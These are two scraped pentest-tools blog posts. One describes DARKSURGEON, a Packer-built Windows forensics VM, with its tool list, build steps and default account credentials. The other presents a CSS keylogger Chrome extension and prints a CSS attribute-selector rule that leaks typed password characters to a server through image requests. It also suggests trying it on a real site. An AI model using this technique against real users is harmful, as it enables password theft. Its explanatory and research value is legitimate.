(FLARE)PE Analysis:DIE (FLARE)EXEInfoPE (FLARE)Malware Analysis Pack (MAP) (FLARE)PEiD (FLARE)ExplorerSuite (CFF Explorer) (FLARE)PEStudio (FLARE)PEview (FLARE)Resource Hacker (FLARE)VirusTotal UploaderPowershell Modules:Active DirectoryAzure ManagementPesterPython Libraries:CryptographyHexdumpOLEToolsLXMLPandasPassivetotalPEFilePyCryptodomeScapyShodanSigmaVisual C++ for PythonVivisectWinAppDBGYara-PythonRed Team:GrouperInveighNmapPowershell EmpirePowerupSQLPSAttackPSAttack Build ToolResponderRemote Management:AWS Command Line (AWSCLI)OpenSSHPuttyRemote Server Administration Tools (RSAT)Utilities:1Password7ZipAdobe Flash PlayerAdobe ReaderAPI MonitorBleachbitBoxstarterBstringsChecksumChocolateyCmderContainers (Hyper-V)CurlCyber ChefDockerDotNet 3.5DotNet 4ExiftoolFLOSS (FLARE)GitGoLangGoogle ChromeGPG4WinHashcalcHashdeepHasherHashtabHyper-VIrfanviewJava JDK8Java JRE8JQJupyterKeepassMicrosoft EdgeMozilla FirefoxMozilla ThunderbirdNeo4j CommunityNodeJSNugetOffice365 ProPlusOpenVPNOsqueryPython 2.7QbittorrentRawCapSlackSublime Text 3Sysinternals SuiteTor BrowserUnixUtilsUPXVisual C++ 2005Visual C++ 2008Visual C++ 2010Visual C++ 2012Visual C++ 2013Visual C++ 2015Visual C++ 2017Visual Studio CodeWindows 10 SDKWindows Subsystem for Linux (WSL)WinlogbeatXorSearchXorStringsVisual Basic Analysis:VBDecompilerBuilding DARKSURGEONBuild ProcessDARKSURGEON is built using the HashiCorp application packer. The total build time for a new instance of DARKSURGEON is around 2–3 hours.Packer creates a new virtual machine using the DARKSURGEON JSON file and your hypervisor of choice (e.g. Hyper-V, Virtualbox, VMWare).The answers.iso file is mounted inside the DARKSURGEON VM along with the Windows ISO. The answers.iso file contains the unattend.xml needed for a touchless installation of windows, as well as a powershell script to configure Windows Remote Management (winrm).Packer connects to the DARKSURGEON VM using WinRM and copies over all files in the helper-scripts and configuration-files directory to the host.Packer performs serial installations of each of the configured powershell scripts, performing occasional reboots as needed. When complete, packer performs a sysprep, shuts down the virtual machine, and creates a vagrant box file. Additional outputs may be specified in the post-processors section of the JSON file.SetupNote: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMWare support are forthcoming.Install packer, vagrant, and your preferred hypervisor on your host.Download the repository contents to your host.Download a Windows 10 Enterprise Evaluation ISO (1803).Move the ISO file to your local DARKSURGEON repository.Update DARKSURGEON.json with the ISO SHA1 hash and file name.(Optional) Execute the powershell script New-DARKSURGEONISO.ps1 to generate a new answers.iso file. There is an answers ISO file included in the repository but you may re-build this if you don’t trust it, or you would like to modify the unattend files: powershell.exe New-DARKSURGEONISO.ps1Build the recipe using packer: packer build -only=[hyperv-iso|vmware|virtualbox] .\DARKSURGEON.jsonConfiguring DARKSURGEONDARKSURGEON is designed to be modular and easy to configure. An example configuration is provided in the DARKSURGEON.json file, but you may add, remove, or tweak any of the underlying scripts.Have a custom CA you need to add? Need to add a license file for IDA? No problem. You can throw any files you need in the configuration-files directory and they’ll be copied over to the host for you.Want to install a custom package, or need some specific OS tweaks? No worries. Simply make a new powershell script (or modify an existing one) in the configuration-scripts directory and add it as a build step in the packer JSON file.Using DARKSURGEONNote: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMWare support are forthcoming.Once DARKSURGEON has successfully built, you’ll receive an output vagrant box file. The box file contains the virtual machine image and vagrant metadata, allowing you to quickly spin up a virtual machine as needed.Install vagrant and your preferred hypervisor on your host.Navigate to the DARKSURGEON repository (or the location where you’ve saved the DARKSURGEON box file). Perform a vagrant up: vagrant upVagrant will now extract the virtual machine image from the box file, read the metadata, and create a new VM for you. Want to kill this VM and get a new one?Easy, just perform the following: vagrant destroy && vagrant upOnce the DARKSURGEON virtual machine is running, you can login using one of the two local accounts:Note: These are default accounts with default credentials. You may want to consider changing the credentials in your packer build.Administrator Account:Username: DarksurgeonPassword: darksurgeonLocal User Account:Username: UnprivilegedPassword: unprivilegedIf you’d rather not use vagrant, you can either import the VM image manually, or look at one of the many other post-processor options provided by packer.Downloading DARKSURGEONIf you’d rather skip the process of building DARKSURGEON and want to trust the box file I’ve built, you can simply download it here.ContributingContributions, fixes, and improvements can be submitted directly against this project as a GitHub issue or pull request. Tools will be reviewed and added on a case-by-case basis.Frequently Asked QuestionsWhy is Hyper-V the preferred hypervisor?I strongly believe in the value of Windows Defender Device Guard and Virtualization Based Security, which require the usage of Hyper-V for optimal effectiveness. As a result, other Hypervisors are not recommended on the host machine. I will do my best to accomodate other mainline hypervisors, but I would encourage all users to try using Hyper-V.Why does the entire packer build fail on a chocolatey package error?This was a design decision that was made to guarantee that all packages which were expected made it into the final packer build. The upside of this decision is that it guarantees all expected tools will be available in the finalized product. The downside is that additional complexity and fragility are inserted the build pipeline, as transient or chocolatey errors may cause a build to fail.If you wish to ignore this functionality, you are free to modify the underlying script to ignore errors on package installation.Does this project support using a Chocolatey Professional/Business/Consultant license?Yes. If you add your license file (named chocolatey.license.xml) to the configuration-files directory when performing a packer build, it will automatically be imported by the Set-ChocolateySettings.ps1 script. Please ensure that your usage of a chocolatey license adheres to their End-User License Agreement.Why are the build functions broken into dozens of individual powershell scriptsFlexibility is key. You may opt to use — or not use — any of these scripts, and in any order. Having individual files, while increasing project complexity, ensures that the project can be completely customized without issue.I want to debug the build. How do I do so?Add the Set-Breakpoint.ps1 script into the provisioner process at the desired point. This will cause the packer build to halt for 4 hours as it waits for the script to complete.TroubleshootingThe packer build process never starts and hangs on the UEFI screen.This is most likely a timing issue caused by the emulated key presses not causing the image to boot from the mounted Windows ISO. Restart your VM and hit any button a few times until the build process starts.Packer timed out during the build. I didn’t receive an error.Due to the size of the packages that are downloaded and installed, you may have exceeded the default packer build time limit.My VM is running, but packer doesn’t seem to connect via WinRM.Connect to the guest and check the following:WinRM is accessible from your packer host. (Test-NetConnection -ComputerName -Port 5985)WinRM is allowed on the guest firewall.I keep getting anti-virus, checksum, or other issues with Chocolatey. What gives?Unfortunately these packages can be a moving target. New updates can render the static checksum in the chocolatey package incorrect, anti-virus may mistakenly flag binaries, etc. Global chocolatey options can be specified to prevent these errors from occurring, but I will do my best to respond to bug reports filed as issues on underlying chocolatey packages.Download DARKSURGEON

Link: http://feedproxy.google.com/~r/PentestTools/~3/B8p_3LOKtq0/darksurgeon-windows-packer-project-to.html

CSS Keylogger – Chrome Extension And Express Server That Exploits Keylogging Abilities Of CSS

Chrome extension and Express server that exploits keylogging abilities of CSS.To useSetup Chrome extensionDownload repository git clone https://github.com/maxchehab/CSS-KeyloggingVisit chrome://extensions in your browser (or open up the Chrome menu by clicking the icon to the far right of the Omnibox: The menu’s icon is three horizontal bars. and select Extensions under the More Tools menu to get to the same place).Ensure that the Developer mode checkbox in the top right-hand corner is checked.Click Load unpacked extension… to pop up a file-selection dialog.Select the css-keylogger-extension in the directory which you downloaded this repository.Setup Express serveryarnyarn startHaxking l33t passw0rdsOpen a website that uses a controlled component framework such as React. https://instagram.com.Press the extension C on the top right of any webpage.Type your password.Your password should be captured by the express server.How it worksThis attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.For example, the following css will select all input’s with a type that equals password and a value that ends with a. It will then try to load an image from http://localhost:3000/a.input[type=”password"][value$="a"] { background-image: url("http://localhost:3000/a");}Using a simple script one can create a css file that will send a custom request for every ASCII character.Download CSS Keylogger

Link: http://feedproxy.google.com/~r/PentestTools/~3/1jiciHQ1uSs/css-keylogger-chrome-extension-and.html